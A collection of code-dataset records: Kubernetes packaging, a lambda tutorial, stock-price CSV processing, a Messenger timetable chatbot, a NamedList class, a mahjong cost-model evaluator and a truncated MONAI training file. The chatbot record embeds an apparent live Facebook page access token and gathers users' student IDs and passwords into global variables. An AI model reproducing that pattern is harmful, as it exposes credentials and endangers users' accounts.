+{"seq_id":"187563436","text":"import logging\nimport os.path\nimport yaml\nimport json\nfrom collections import OrderedDict\nimport jsonpatch\nimport kpm.manifest_jsonnet as manifest\nfrom kpm.kubernetes import get_endpoint\nfrom kpm.utils import convert_utf8\nfrom kpm.kub_base import KubBase\n\n\nlogger = logging.getLogger(__name__)\n\n\n_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG\n\n\nclass KubJsonnet(KubBase):\n    def __init__(self, *args, **kwargs):\n        shards = kwargs.get(\"shards\", None)\n        if shards.__class__ in [str, unicode]:\n            shards = json.loads(shards)\n        kwargs['shards'] = shards\n\n        super(KubJsonnet, self).__init__(*args, **kwargs)\n\n        self.tla_codes = {\"variables\": self._deploy_vars}\n        if shards is not None:\n            self.tla_codes[\"shards\"] = shards\n\n        self.manifest = manifest.ManifestJsonnet(self.package, {\"params\": json.dumps(self.tla_codes)})\n\n    def _create_namespaces(self):\n        if self.namespace:\n            ns = self.create_namespace(self.namespace)\n            self._resources.insert(0, ns)\n\n    @property\n    def kubClass(self):\n        return KubJsonnet\n\n    @property\n    def dependencies(self):\n        if self._dependencies is None:\n            self._fetch_deps()\n        return self._dependencies\n\n    def _init_resources(self):\n        index = 0\n        for resource in self._resources:\n            index += 1\n            resource[\"order\"] = index\n            if 'protected' not in resource:\n                resource[\"protected\"] = False\n\n    def resources(self):\n        if self._resources is None:\n            self._resources = self.manifest.resources\n            self._create_namespaces()\n        return self._resources\n\n    def prepare_resources(self, dest=\"/tmp\", index=0):\n        for resource in self.resources():\n            index += 1\n            path = os.path.join(dest, \"%02d_%s_%s\" % (index,\n                                                      self.version,\n                                                      resource['file']))\n            f = open(path, 'w')\n            f.write(yaml.safe_dump(convert_utf8(resource['value'])))\n            resource['filepath'] = f.name\n            f.close()\n        return index\n\n    def build(self):\n        result = []\n        for kub in self.dependencies:\n            kubresources = OrderedDict([(\"package\", kub.name),\n                                        (\"version\", kub.version),\n                                        (\"namespace\", kub.namespace),\n                                        (\"resources\", [])])\n            for resource in kub.resources():\n                self._annotate_resource(kub, resource)\n                kubresources['resources'].\\\n                    append(OrderedDict({\"file\": resource['file'],\n                                        \"hash\": resource['value']['metadata']['annotations'].get('kpm.hash', None),\n                                        \"protected\": resource['protected'],\n                                        \"name\": resource['name'],\n                                        \"kind\": resource['value']['kind'].lower(),\n                                        \"endpoint\": get_endpoint(\n                                            resource['value']['kind'].lower()).\n                                        format(namespace=self.namespace),\n                                        \"body\": json.dumps(resource['value'])}))\n\n            result.append(kubresources)\n        return {\"deploy\": result,\n                \"package\": {\"name\": self.name,\n                            \"version\": self.version}}\n\n    def _apply_patches(self, resources):\n        for _, resource in resources.iteritems():\n            if self.namespace:\n                if 'namespace' in resource['value']['metadata']:\n                    op = 'replace'\n                else:\n                    op = 'add'\n                resource['patch'].append({\"op\": op, \"path\": \"/metadata/namespace\", \"value\": self.namespace})\n\n            if len(resource['patch']):\n                patch = jsonpatch.JsonPatch(resource['patch'])\n                result = patch.apply(resource['value'])\n                resource['value'] = result\n        return resources\n","sub_path":"kpm/kub_jsonnet.py","file_name":"kub_jsonnet.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"577527063","text":"\"\"\"\n    lambda: anonymous function\n    syntax: lambda parameters: expression\n\"\"\"\n# define a lambda with parameters\nfunc = lambda item:item % 2 == 0\nre = func(5)\nprint(re)\n\n# define a lambda with no parameters\nfunc = lambda :100\nre = func()\nprint(re)\n\n# define a lambda with multiple parameters\nfunc = lambda a,b,c:a+b+c\nre = func(1,2,3)\nprint(re)\n\n# define a lambda with no return value\nfunc = lambda a:print(\"The variable is:\",a)\nfunc(10)\n
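\n# --- Aside (added for illustration; not part of the original demo): lambdas\n# shine as inline key/predicate arguments to higher-order functions.\npairs = [(2, 'b'), (1, 'c'), (3, 'a')]\nprint(sorted(pairs, key=lambda p: p[1]))             # sort by second element\nprint(list(filter(lambda p: p[0] % 2 == 1, pairs)))  # keep odd first elements\n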
\nclass A:\n    def __init__(self,a):\n        self.a = a\n\ndef fun01(obj):\n    obj.a = 100\n\no = A(10)\nfun01(o)\nprint(o.a)\n\n# SyntaxError: can't assign to lambda\n# a lambda does not support assignment statements\n# func = lambda obj:obj.a = 100\n\n# a lambda body may contain only a single expression\ndef fun01(a,b):\n    if a % 2 == 0:\n        print(a+b)\n\n# lambda a,b:if a % 2 == 0: print(a+b)\n\n\nlist01 = [4,5,5,6,767,8,10]\n\n# def condition01(item):\n#     return item % 2 == 0\n#\n# def condition02(item):\n#     return item % 2\n#\n# def condition03(item):\n#     return item > 10\n\ndef find(target,func):\n    for item in target:\n        if func(item):\n            yield item\n\n# for item in find(list01,condition03):\n#     print(item)\n\nfor item in find(list01,lambda item:item > 10):\n    print(item)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_base/code/day17/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"236133392","text":"import csv\nimport StockReport\nfrom itertools import islice\n\nstockList = []\nstockListFix = []\n\nwith open('us-derived-quarterly.csv') as csvfile:\n    readCSV = csv.reader(csvfile, delimiter=';')\n    for row in readCSV:\n        if (not row[0]) or (not row[3]) or (not row[4]) or (not row[6]) or (not row[26]) or (row[0] == \"Ticker\"):\n            continue\n        sr = StockReport.StockReport(row[0], row[4], row[3], row[6], row[26])\n        stockList.append(sr)\n\ni = 1\nfor report in stockList:\n    if(report.quarter == \"Q1\"):\n        for report2 in stockList:\n            if(report2.ticker == report.ticker and report2.quarter == \"Q2\" and report2.year == report.year):\n                report.endDate = report2.startDate\n    if(report.quarter == \"Q2\"):\n        for report2 in stockList:\n            if(report2.ticker == report.ticker and report2.quarter == \"Q3\" and report2.year == report.year):\n                report.endDate = report2.startDate\n    if(report.quarter == \"Q3\"):\n        for report2 in stockList:\n            if(report2.ticker == report.ticker and report2.quarter == \"Q4\" and report2.year == report.year):\n                report.endDate = report2.startDate\n    if(report.quarter == \"Q4\"):\n        for report2 in stockList:\n            if(report2.ticker == report.ticker and report2.quarter == \"Q1\" and int(report2.year) == int(report.year) + 1):\n                report.endDate = report2.startDate\n    print(i)\n    i+=1\n    if(i>100000): break\n\nfor report in stockList:\n    if (not report.ticker) or (not report.quarter) or (not report.year) or (not report.startDate) or (not report.endDate) or (not report.fscore):\n        continue\n    else:\n        stockListFix.append(report)\n
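\n# --- Aside (added for illustration; not in the original script): the reason\n# islice() is used below -- it skips leading CSV rows lazily, without reading\n# the whole file into memory first. Self-contained toy example:\nfrom itertools import islice\n_rows = ['row%d' % _i for _i in range(10)]\nprint(list(islice(_rows, 3, 6)))  # -> ['row3', 'row4', 'row5']\n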
i = 1\nticker = \"\"\nrowNum=0\nfor report in stockListFix:\n    startPrice = 0\n    endPrice = 0\n    ratio = 0\n    with open('us-shareprices-daily.csv') as csvfile:\n        if (ticker != report.ticker):\n            ticker = report.ticker\n            rowNum=0\n            for row in islice(csv.reader(csvfile), 0, None):\n\n                rowTicker = row[0].split(\";\")[0]\n                rowDate = row[0].split(\";\")[2]\n                rowPrice = row[0].split(\";\")[3]\n                rowNum +=1\n\n                if (not rowTicker) or (not rowDate) or (not rowPrice) or (rowTicker == \"Ticker\"):\n                    continue\n                elif (rowTicker == report.ticker) and (rowDate == report.startDate):\n                    startPrice = rowPrice\n                elif (rowTicker == report.ticker) and (rowDate == report.endDate):\n                    endPrice = rowPrice\n                    break\n        else:\n            for row in islice(csv.reader(csvfile), rowNum-365, None): #starting at rowNum was skipping some start date values so adjusted it back a year\n\n                rowTicker = row[0].split(\";\")[0]\n                rowDate = row[0].split(\";\")[2]\n                rowPrice = row[0].split(\";\")[3]\n\n                if (not rowTicker) or (not rowDate) or (not rowPrice) or (rowTicker == \"Ticker\"):\n                    continue\n                elif (rowTicker == report.ticker) and (rowDate == report.startDate):\n                    startPrice = rowPrice\n                elif (rowTicker == report.ticker) and (rowDate == report.endDate):\n                    endPrice = rowPrice\n                    break\n\n    if (float(endPrice) > 0) and (float(startPrice) > 0):\n        ratio = float(endPrice) / float(startPrice)\n        report.returns = ratio\n        print(report)\n        f = open(\"output.txt\", \"a\")\n        f.write(report.ticker + \",\" + report.startDate + \",\" + report.endDate + \",\" + str(report.fscore) + \",\" + str(report.returns) + \"\\n\")\n        print(i)\n        i += 1\n","sub_path":"CSVreader.py","file_name":"CSVreader.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"127543887","text":"from flask import Flask, request\nimport json\nimport requests\nimport chatbot\nimport os\napp = Flask(__name__)\nVERIFY_TOKEN = '@thaonguyen'\nFB_API_URL = 'https://graph.facebook.com/v5.0/me/messages'\nPAGE_ACCESS_TOKEN = 'EAAVJSnewzxkBAEPvZArsPw3Y7R2WvocuukAnpHTiNZBdywPIO4JESkeraVJz1c8vXgu1ZCtxTlbtZCZAsMpZBZBTiSB4YYUzwVfmsU4QTdX1ZBJBNrCwxvXktrOSd93jxtKj147U6XjysbOFDsklgVNWEMrLUydelJ28chC1K2yPVpXlrrkZA9RKO8JTeUTlUtyAZD'\n\ncount=0\ncheckmk=False\ntk=''\nmk=''\ndef send_message(recipient_id, text):\n    \"\"\"Send a response to Facebook\"\"\"\n    params = {\n        \"access_token\": PAGE_ACCESS_TOKEN\n    }\n    headers = {\n        \"Content-Type\": \"application/json\"\n    }\n    data = json.dumps({\"recipient\": {\n        \"id\": recipient_id\n    },\n        \"message\": {\n            \"text\": text\n        }})\n    print(data)\n    r = requests.post(\"https://graph.facebook.com/v5.0/me/messages\",params=params, headers=headers, data=data)\n\n    return r.json()\n\n\ndef showmess(data):\n    try:\n        messaging = ((data[\"entry\"][0][\"messaging\"]))\n        return(messaging[0][\"message\"][\"text\"])\n    except :\n        return \"error reading message\"\n\n\ndef id_replace(data):\n    try:\n        id_user = data[\"entry\"][0][\"messaging\"][0][\"sender\"][\"id\"]\n        return id_user\n    except:\n        return \"error getting sender id\"\n\ndef laytkmk(data):\n    send_message(id_replace(data),\"enter your student ID: \")\n    tk=showmess(data)\n    send_message(id_replace(data),\"enter your password: \")\n    mk=showmess(data)\n\n@app.route('/', methods=['GET'])\ndef verify():\n    # when the endpoint is registered as a webhook, it must echo back\n    # the 'hub.challenge' value it receives in the query arguments\n    if request.args.get(\"hub.mode\") == \"subscribe\" and request.args.get(\"hub.challenge\"):\n        if not request.args.get(\"hub.verify_token\") == VERIFY_TOKEN:\n            return \"Verification token mismatch\", 403\n        return request.args[\"hub.challenge\"], 200\n    return \"Hello world\", 200\n\n\n@app.route('/', methods=['POST'])\ndef webhook():\n    global count,tk,mk\n    data = request.get_json()\n    try:\n        if showmess(data)=='tkb':\n            send_message(id_replace(data),\"Processing\"+\" step: \"+str(count+1))\n            send_message(id_replace(data),\"please enter your student ID: \")\n            count=1\n        elif (showmess(data)).isdigit() and count==1:\n            send_message(id_replace(data),\"Processing\"+\" step: \"+str(count+1))\n            send_message(id_replace(data),\"please enter your password\")\n            tk=showmess(data)\n            count=0\n        elif count!=1 :\n            mk=showmess(data)\n            if tk!='' and mk!='':\n                mk=showmess(data)\n                send_message(id_replace(data),\"Processing\")\n                try:\n                    send_message(id_replace(data),chatbot.xulyngay(tk,mk))\n                    count=0;tk='';mk=''\n                except :\n                    send_message(id_replace(data),\"error while fetching the timetable\")\n                    count=0;tk='';mk=''\n\n    except Exception as e:\n        send_message(id_replace(data),\"serious error\")\n        print(e)\n    return data\n\n\nif __name__ == \"__main__\":\n    
app.run()\n","sub_path":"webhooks.py","file_name":"webhooks.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"81335769","text":"\"\"\"\nCopyright (c) 2015 Jaye Doepke\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\nfrom __future__ import with_statement, absolute_import, unicode_literals, division, print_function\n\nfrom bisect import bisect_left, insort_left\nfrom collections import defaultdict\nfrom copy import copy, deepcopy\nfrom threading import RLock\n\nimport six\nfrom six.moves import UserList, zip, range\n\nfrom .lock import LockContextManager\n\n\nclass NamedList(UserList):\n \"\"\"\n A class for maintaining a list of named values.\n The names are always strings.\n Duplicate names are allowed.\n Is threadsafe.\n \"\"\"\n __slots__ = ['_lock', 'data', '_index', '_rindex']\n\n def __init__(self, init_data=None):\n \"\"\"\n :param init_data: optional - either a NamedList or an iterable of (name, value) tuples.\n \"\"\"\n super(NamedList, self).__init__()\n self._lock = LockContextManager(RLock())\n\n if isinstance(init_data, NamedList):\n with init_data._lock:\n self.data = copy(init_data.data)\n self._index = copy(init_data._index)\n self._rindex = copy(init_data._rindex)\n return\n\n self.data = []\n self._index = defaultdict(list)\n self._rindex = {}\n\n if init_data is not None:\n if isinstance(init_data, dict):\n for name, value in six.iteritems(init_data):\n self.append(name, value)\n else:\n for name, value in init_data:\n self.append(name, value)\n\n def append(self, name, value):\n \"\"\"\n Append a value to this NamedList.\n :param str name:\n :param value:\n \"\"\"\n if not isinstance(name, six.string_types):\n raise TypeError(\"key must be a string\")\n with self._lock:\n self.data.append(value)\n index = len(self.data) - 1\n self._index[name].append(index)\n self._rindex[index] = name\n\n def insert(self, index, name, value):\n self_len = len(self)\n if index > self_len:\n raise ValueError(\"cannot insert into %s at index greater than current len()\" % (self.__class__.__name__,))\n\n to_upshift = dict((i, self._rindex[i]) for i in range(len(self) - 1, index - 1, -1)) # Go in reverse order\n for upshift_index, upshift_name in six.iteritems(to_upshift):\n plus_one = upshift_index + 1\n\n # _index\n index_list = self._index[upshift_name]\n index_list.remove(upshift_index)\n insort_left(index_list, plus_one)\n\n # _rindex\n del self._rindex[upshift_index]\n self._rindex[plus_one] = 
upshift_name\n\n self.data.insert(index, value)\n insort_left(self._index[name], index)\n self._rindex[index] = name\n\n def extend(self, other):\n \"\"\"\n Add all the values from another NamedList to this one,\n or add all the values from a dict whose keys are all name strings.\n\n :param other: A NamedList or dict with all string keys.\n \"\"\"\n if isinstance(other, NamedList):\n with self._lock:\n with other._lock:\n for name, value in other.items():\n self.append(name, value)\n elif isinstance(other, dict):\n with self._lock:\n if not all(isinstance(key, six.string_types) for key in other.keys()):\n raise ValueError(\"dict contains non-string keys\")\n for name, value in six.iteritems(other):\n self.append(name, value)\n else:\n raise TypeError(\"can extend from a %s\" % (other.__class__.__name__,))\n\n def __iter__(self):\n return iter(self.data)\n\n def items(self):\n \"\"\"\n :return: iterator that returns (name, value) pairs.\n \"\"\"\n for i in range(len(self)):\n yield (self._rindex[i], self.data[i])\n\n def iteritems(self):\n return self.items()\n\n def _negative_index_to_positive(self, index):\n # Convert a negative list index to a positive one.\n with self._lock:\n while index < 0:\n index += len(self.data)\n return index\n\n def get_name(self, index):\n \"\"\"\n :param int index: a list element index\n :return: the name of the element\n \"\"\"\n with self._lock:\n index = self._negative_index_to_positive(index)\n try:\n return self._rindex[index]\n except KeyError:\n raise IndexError(\"index %s out of range\" % (index,))\n\n def set_name(self, index, name):\n \"\"\"\n The the name of an element in the list.\n :param int index: a list element index\n :param str name: a name string\n \"\"\"\n with self._lock:\n index = self._negative_index_to_positive(index)\n old_name = self.get_name(index)\n self._index[old_name].remove(index)\n insort_left(self._index[name], index)\n self._rindex[index] = name\n\n def __copy__(self):\n with self._lock:\n return NamedList(self)\n\n def __deepcopy__(self, memo):\n with self._lock:\n return NamedList((name, deepcopy(value, memo)) for name, value in self.items())\n\n def __contains__(self, name):\n with self._lock:\n return name in self._index\n\n def __add__(self, other):\n with self._lock:\n if isinstance(other, NamedList):\n result = NamedList(self)\n for name, value in other.items():\n result.append(name, value)\n return result\n else:\n raise TypeError(\"cannot add %s and %s\" % (self.__class__.__name__, other.__class__.__name__))\n\n def __iadd__(self, other):\n with self._lock:\n self.extend(other)\n return self\n\n def __mul__(self, other):\n with self._lock:\n if not isinstance(other, six.integer_types):\n raise TypeError(\"%s can only multiply by an int\" % (self.__class__.__name__,))\n if other < 0:\n raise ValueError(\"%s cannot multiply by an int < 0 \" % (self.__class__.__name__,))\n with self._lock:\n result = NamedList()\n for i in range(other):\n result.extend(self)\n return result\n\n def __len__(self):\n with self._lock:\n return len(self.data)\n\n def index(self, name, start=0):\n \"\"\"\n :param str name: the name of an element in the list\n :param int start: start from this element\n :return: the first index of a value with ``name``.\n \"\"\"\n with self._lock:\n if name not in self._index:\n raise ValueError(\"%s is not in the %s\" % (name, self.__class__.__name__))\n indices = self._index[name]\n i = bisect_left(indices, start)\n if i >= len(indices):\n raise ValueError(\"%s is not in the %s\" % (name, 
self.__class__.__name__))\n return indices[i]\n\n def __getitem__(self, key):\n \"\"\"\n NamedList supports four methods of indexed access::\n\n my_named_list = NamedList([\n (\"foo\", \"bar\"),\n (\"bar\", \"foo\"),\n (\"foo\", 1),\n (\"bar\", NamedList([(\"tholomew\", 5)]))\n ])\n\n my_named_list[0]\n # \"bar\"\n\n my_named_list[1:3]\n # NamedList([(\"bar\", \"foo\"), (\"foo\", 1)])\n\n my_named_list[\"foo\"]\n # [\"bar\", 1]\n\n my_named_list[\"bar\", \"tholomew\"] # Nested NamedList access\n # 5\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Get list of all values with this name\n if key not in self._index:\n raise KeyError(key)\n indices = self._index[key]\n return [self.data[i] for i in indices]\n\n elif isinstance(key, six.integer_types):\n # Get specific index\n return self.data[key]\n\n elif isinstance(key, slice):\n # Get slice\n indices = range(*key.indices(len(self)))\n return NamedList((self.get_name(i), self.data[i]) for i in indices)\n\n elif isinstance(key, tuple):\n # Get item recursivly\n key, other_keys = key[0], key[1:]\n lst = self[key]\n if not other_keys:\n # End recursion\n return lst\n for element in lst:\n if isinstance(element, NamedList):\n return element[other_keys]\n elif isinstance(element, dict) and len(other_keys) == 1:\n return [element[other_keys[0]]]\n raise KeyError(\"cannot recurse with key '%s'\" % (key,))\n\n else:\n raise TypeError(\"key must be a string, int, or slice\")\n\n def __getslice__(self, i, j):\n with self._lock:\n return self.__getitem__(slice(i, j, 1))\n\n def __setitem__(self, key, value):\n \"\"\"\n ::\n\n my_named_list = NamedList([\n (\"foo\", \"bar\"),\n (\"bar\", \"foo\"),\n (\"foo\", 1),\n (\"bar\", NamedList([(\"tholomew\", 5)]))\n ])\n\n my_named_list[\"bar\"] = [3]\n # NamedList([(\"foo\", \"bar\"), (\"foo\", 1), (\"bar\", 3)])\n\n my_named_list[1] = \"bacon\"\n # NamedList([(\"foo\", \"bar\"), (\"foo\", \"bacon\"), (\"bar\", 3)])\n\n my_named_list[:2] = [1, 2]\n # NamedList([(\"foo\", 1), (\"foo\", 2), (\"bar\", 3)])\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Replace name\n if not hasattr(value, '__iter__'):\n raise TypeError(\"value not iterable\")\n if key in self:\n del self[key]\n for v in value:\n self.append(key, v)\n\n elif isinstance(key, six.integer_types):\n # Replace index\n key = self._negative_index_to_positive(key)\n if key >= len(self):\n raise IndexError(\"%s exceeds %s size\" % (str(key), self.__class__.__name__))\n self.data[key] = value\n\n elif isinstance(key, slice):\n # Replace slice\n indices = range(*key.indices(len(self)))\n if len(indices) != len(value):\n raise ValueError(\"can only replace slice with list of same size\")\n for i in range(len(indices)):\n self[i] = value[i]\n\n else:\n raise TypeError(\"key must be string, int, or slice\")\n\n def __setslice__(self, i, j, value):\n with self._lock:\n self.__setitem__(slice(i, j, 1), value)\n\n def __delitem__(self, key):\n \"\"\"\n ::\n\n del my_named_list[0] # delete element at index 0\n del my_named_list[\"foo\"] # delete all elements with name \"foo\"\n del my_named_list[1:3] # delete elements 1 and 2\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Remove all keys with this name\n if key not in self._index:\n raise KeyError(key)\n indices = self._index[key][::-1] # Delete in reverse order\n for index in indices:\n del self[index]\n\n elif isinstance(key, six.integer_types):\n # Remove item at index\n name = self._rindex.pop(key)\n if name not in self._index:\n raise 
IndexError(\"%s assignment index out of range\" % (self.__class__.__name__,))\n\n # We'll have to shift all the indexes after ``key`` down by 1\n to_downshift = dict((i, self._rindex[i]) for i in range(key + 1, len(self)))\n\n index = self._index[name]\n index.remove(key)\n if not index:\n del self._index[name]\n del self.data[key]\n\n # Shift higher indexes down by 1\n for index, name in six.iteritems(to_downshift):\n minus_one = index - 1\n\n # _index\n index_list = self._index[name]\n index_list.remove(index)\n insort_left(index_list, minus_one)\n\n # _rindex\n del self._rindex[index]\n self._rindex[minus_one] = name\n\n elif isinstance(key, slice):\n # Remove by slice\n indices = key.indices(len(self))\n indices = [indices[1] - 1, indices[0] - 1, -1] # delete in reverse order\n for i in range(*indices):\n del self[i]\n\n else:\n raise TypeError(\"key must be a string, int, or slice\")\n\n def __delslice__(self, i, j):\n with self._lock:\n self.__delitem__(slice(i, j, 1))\n\n def __eq__(self, other):\n if isinstance(other, NamedList):\n if len(self) != len(other):\n return False\n for x, y in zip(self.items(), other.items()):\n if x != y:\n return False\n return True\n return False\n\n def __repr__(self):\n return \"%s(%s)\" % (self.__class__.__name__, repr(list(self.items())))\n","sub_path":"solrj/util/namedlist.py","file_name":"namedlist.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325915605","text":"import json\nimport logging\nimport os\n\nimport numpy as np\nfrom agari_riichi_cost.protocol import AgariRiichiCostProtocol\nfrom base.model import Model\nfrom hickle import hickle\nfrom mahjong.constants import EAST, SOUTH\nfrom mahjong.hand_calculating.hand_config import HandConfig\nfrom mahjong.hand_calculating.scores import ScoresCalculator\nfrom sklearn.metrics import accuracy_score, mean_squared_error, precision_recall_fscore_support\n\nlogger = logging.getLogger(\"logs\")\n\n\nclass AgariRiichiCostModel(Model):\n model_attributes = {\n \"optimizer\": \"adam\",\n \"loss\": \"sparse_categorical_crossentropy\",\n \"metrics\": [\"accuracy\"],\n }\n\n output = \"softmax\"\n units = 1024\n batch_size = 512\n\n input_size = AgariRiichiCostProtocol.input_size\n output_size = AgariRiichiCostProtocol.output_size\n\n def print_best_result(self):\n best_result = sorted(self.after_epoch_attrs, key=lambda x: x[\"empirical\"], reverse=True)[0]\n logger.info(\"Best result\")\n logger.info(json.dumps(best_result, indent=2))\n\n def calculate_predictions(self, model, epoch):\n real_indices = []\n predicted_indices = []\n\n data_files = os.listdir(self.data_path)\n correct_predictions = 0\n border_30_correct_predictions = 0\n border_20_correct_predictions = 0\n border_10_correct_predictions = 0\n for f in data_files:\n if not f.startswith(\"test_\"):\n continue\n\n test_file_path = os.path.join(self.data_path, f)\n test_data = hickle.load(test_file_path)\n test_input = np.asarray(test_data[\"input_data\"]).astype(\"float32\")\n test_verification = test_data[\"verification_data\"]\n\n predictions = model.predict(test_input, verbose=1)\n logger.info(\"predictions shape = {}\".format(predictions.shape))\n\n for i, prediction in enumerate(predictions):\n original_cost, han, fu, is_dealer = test_verification[i]\n\n key = AgariRiichiCostProtocol.build_category_key(han, fu)\n real_index = AgariRiichiCostProtocol.HAND_COST_CATEGORIES[key]\n real_indices.append(real_index)\n\n predicted_index = 
np.argmax(prediction)\n predicted_key = sorted(\n [\n x[0]\n for x in AgariRiichiCostProtocol.HAND_COST_CATEGORIES.items()\n if x[1] == predicted_index\n ]\n )[-1]\n if \"-\" in predicted_key:\n han = int(predicted_key.split(\"-\")[0])\n fu = int(predicted_key.split(\"-\")[1])\n else:\n han = int(predicted_key)\n fu = 0\n\n predicted_indices.append(predicted_index)\n\n hand = ScoresCalculator()\n player_wind = is_dealer and EAST or SOUTH\n config = HandConfig(player_wind=player_wind)\n predicted_cost = hand.calculate_scores(han=han, fu=fu, config=config)[\"main\"]\n\n if is_dealer and self.is_dealer_hand_correctly_predicted(original_cost, predicted_cost):\n correct_predictions += 1\n\n if not is_dealer and self.is_regular_hand_correctly_predicted(original_cost, predicted_cost):\n correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 30):\n border_30_correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 20):\n border_20_correct_predictions += 1\n\n if self.error_border_predicted(original_cost, predicted_cost, 10):\n border_10_correct_predictions += 1\n\n assert len(real_indices) == len(predicted_indices)\n\n accuracy = accuracy_score(real_indices, predicted_indices)\n\n precision, recall, fscore, _ = precision_recall_fscore_support(\n real_indices, predicted_indices, average=\"macro\"\n )\n\n mean_squared_error_result = mean_squared_error(real_indices, predicted_indices)\n empirical_prediction = (correct_predictions / len(real_indices)) * 100\n border_30_correct_predictions = (border_30_correct_predictions / len(real_indices)) * 100\n border_20_correct_predictions = (border_20_correct_predictions / len(real_indices)) * 100\n border_10_correct_predictions = (border_10_correct_predictions / len(real_indices)) * 100\n\n logger.info(\"accuracy: {}\".format(accuracy))\n logger.info(\"precision: {}\".format(precision))\n logger.info(\"recall: {}\".format(recall))\n logger.info(\"fscore (more is better): {}\".format(fscore))\n logger.info(\"mean squared error: {}\".format(mean_squared_error_result))\n logger.info(f\"30%: {border_30_correct_predictions}\")\n logger.info(f\"20%: {border_20_correct_predictions}\")\n logger.info(f\"10%: {border_10_correct_predictions}\")\n logger.info(f\"empirical: {empirical_prediction}\")\n\n if epoch:\n self.after_epoch_attrs.append(\n {\n \"epoch\": epoch,\n \"accuracy\": accuracy,\n \"precision\": precision,\n \"recall\": recall,\n \"fscore\": fscore,\n \"mean_squared_error\": mean_squared_error_result,\n \"empirical\": empirical_prediction,\n \"30\": border_30_correct_predictions,\n \"20\": border_20_correct_predictions,\n \"10\": border_10_correct_predictions,\n }\n )\n\n def error_border_predicted(self, original_cost, predicted_cost, border_percentage):\n first_border = predicted_cost - round((predicted_cost / 100) * border_percentage)\n second_border = predicted_cost + round((predicted_cost / 100) * border_percentage)\n\n if first_border < original_cost < second_border:\n return True\n\n return False\n\n def is_dealer_hand_correctly_predicted(self, original_cost, predicted_cost):\n assert original_cost >= 2000\n\n if original_cost <= 3900 and predicted_cost <= 5800:\n return True\n\n if 3900 < original_cost <= 5800 and predicted_cost <= 7700:\n return True\n\n if 5800 < original_cost <= 7700 and 3900 <= predicted_cost <= 12000:\n return True\n\n if 7700 < original_cost <= 12000 and 5800 <= predicted_cost <= 18000:\n return True\n\n if 12000 < original_cost <= 18000 and 7700 <= 
predicted_cost <= 24000:\n return True\n\n if original_cost > 18000 and predicted_cost > 12000:\n return True\n\n return False\n\n def is_regular_hand_correctly_predicted(self, original_cost, predicted_cost):\n assert original_cost >= 1300\n\n if original_cost <= 2600 and predicted_cost <= 3900:\n return True\n\n if 2600 < original_cost <= 3900 and predicted_cost <= 5200:\n return True\n\n if 3900 < original_cost <= 5200 and 2600 <= predicted_cost <= 8000:\n return True\n\n if 5200 < original_cost <= 8000 and 3900 <= predicted_cost <= 12000:\n return True\n\n if 8000 < original_cost <= 12000 and 5200 <= predicted_cost <= 16000:\n return True\n\n if original_cost > 12000 and predicted_cost > 8000:\n return True\n\n return False\n","sub_path":"project/agari_riichi_cost/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"617003025","text":"# Copyright 2020 - 2021 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport glob\nimport logging\nimport os\n\nimport torch\nfrom monai.handlers import MeanDice, from_engine\nfrom monai.inferers import SimpleInferer\nfrom monai.losses import DiceCELoss\nfrom monai.transforms import (\n Activationsd,\n AddChanneld,\n AsDiscreted,\n LoadImaged,\n Orientationd,\n RandFlipd,\n RandRotate90d,\n RandShiftIntensityd,\n Resized,\n ScaleIntensityRanged,\n Spacingd,\n ToNumpyd,\n ToTensord,\n)\n\nfrom monailabel.deepedit.handlers import TensorBoardImageHandler\nfrom monailabel.deepedit.multilabel.interaction import Interaction\nfrom monailabel.deepedit.multilabel.transforms import (\n AddGuidanceSignalCustomd,\n AddInitialSeedPointCustomd,\n FindAllValidSlicesCustomd,\n FindDiscrepancyRegionsCustomd,\n PosNegClickProbAddRandomGuidanceCustomd,\n SelectLabelsAbdomenDatasetd,\n SplitPredsLabeld,\n)\nfrom monailabel.tasks.train.basic_train import BasicTrainTask\n\nlogger = logging.getLogger(__name__)\n\n\nclass 